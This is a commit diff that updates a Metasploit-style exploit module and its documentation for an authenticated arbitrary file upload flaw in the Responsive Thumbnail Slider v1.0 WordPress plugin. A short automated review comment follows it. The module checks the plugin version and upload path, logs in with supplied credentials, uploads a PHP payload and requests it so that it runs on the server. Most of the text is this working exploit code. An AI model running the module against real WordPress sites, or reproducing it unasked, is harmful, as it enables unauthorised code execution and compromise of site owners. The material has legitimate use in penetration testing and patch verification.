Update module and its documentation

Wei Chen 2018-07-26 23:08:20 -05:00
parent be1bf8b1fc
commit 72d634b10b
2 changed files with 59 additions and 55 deletions


@ -1,13 +1,16 @@
## Vulnerable Application
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin
v1.0 for WordPress post authentication.
For testing purposes, you may download a vulnerable version [here](https://www.exploit-db.com/apps/f5d34e16d07e61ad6826d2c1f3d16089-wp-responsive-thumbnail-slider.zip).
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use [exploit/multi/http/wp_responsive_thumbnail_slider_upload]```
3. Do: ```use exploit/multi/http/wp_responsive_thumbnail_slider_upload```
4. Do: ```set RHOSTS [IP]```
5. Do: ```set TARGETURI [URI]```
6. Do: ```set USERNAME [USERNAME]```


@ -4,21 +4,24 @@
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::PhpEXE
def initialize(info={})
super(update_info(info,
'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider
Plugin v1.0 for WordPress post authentication.
},
'License' => MSF_LICENSE,
'Author' => [ 'Arash Khazaei', # EDB PoC
'Shelby Pace' # Metasploit Module
],
'Author' =>
[
'Arash Khazaei', # EDB PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'EDB', '37998' ]
@ -29,10 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
[
[ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Privileged' => false,
'DisclosureDate' => "Aug 28 2015",
'DefaultTarget' => 0))
@ -40,12 +39,42 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]),
OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ])
OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
])
end
def check
# The version regex found in extract_and_check_version does not work for this plugin's
# readme.txt, so we build a custom one.
check_code = check_version || check_plugin_path
if check_code
return check_code
else
return CheckCode::Safe
end
end
def check_version
plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')
res = send_request_cgi(
'method' => 'GET',
'uri' => plugin_uri
)
if res && res.body && res.body =~ /Version:([\d\.]+)/
version = Gem::Version.new($1)
if version <= Gem::Version.new('1.0')
vprint_status("Plugin version found: #{version}")
return CheckCode::Appears
end
end
nil
end
def check_plugin_path
plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
res = send_request_cgi(
@ -53,51 +82,22 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => plugin_uri
)
unless res && res.code == 200
return Exploit::CheckCode::Safe
if res && res.code == 200
vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
return CheckCode::Detected
end
Exploit::CheckCode::Detected
nil
end
def login
wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => wp_uri
)
auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies
if res && res.body.include?("WordPress") && res.code == 200
print_status("WordPress accessed")
else
fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
end
store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
cookies = res.get_cookies
wp_login_res = send_request_cgi(
'method' => 'POST',
'uri' => wp_uri,
'cookie' => cookies,
'vars_post' => {
'log' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD'],
'wp-submit' => 'Log In',
'redirect_to' => redirect_uri
}
)
auth_cookies = wp_login_res.get_cookies
auth_res = send_request_cgi(
'method' => 'GET',
'uri' => redirect_uri,
'cookie' => auth_cookies
)
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
print_good("Logged into WordPress")
upload_payload(auth_cookies)
print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
auth_cookies
end
def upload_payload(cookies)
@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
print_good("Successful upload")
execute = send_request_raw(
send_request_cgi(
'uri' => file_uri,
'method' => 'GET',
'cookie' => cookies
@ -151,8 +151,9 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
unless check == Exploit::CheckCode::Safe
login
unless check == CheckCode::Safe
auth_cookies = login
upload_payload(auth_cookies)
end
end
end
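Review bot: The new success message in `login` prints the WordPress password in clear text, `print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")`, so it lands in console scrollback and any spooled log even though `store_valid_credential` a few lines earlier already records it; logging the username alone, `print_good("Logged into WordPress as #{datastore['WPUSERNAME']}")`, would be enough. In `check_version`, `[\d\.]+` also matches strings such as `1.` or `..`, which `Gem::Version.new` rejects with an ArgumentError, so a malformed readme.txt would raise out of `check`; `/Version:(\d+(?:\.\d+)*)/` keeps the capture parseable. The documentation hunk on this page still lists `set USERNAME [USERNAME]` after the options were renamed to `WPUSERNAME`/`WPPASSWORD`; the rest of that file is not visible here, so this may already be corrected further down.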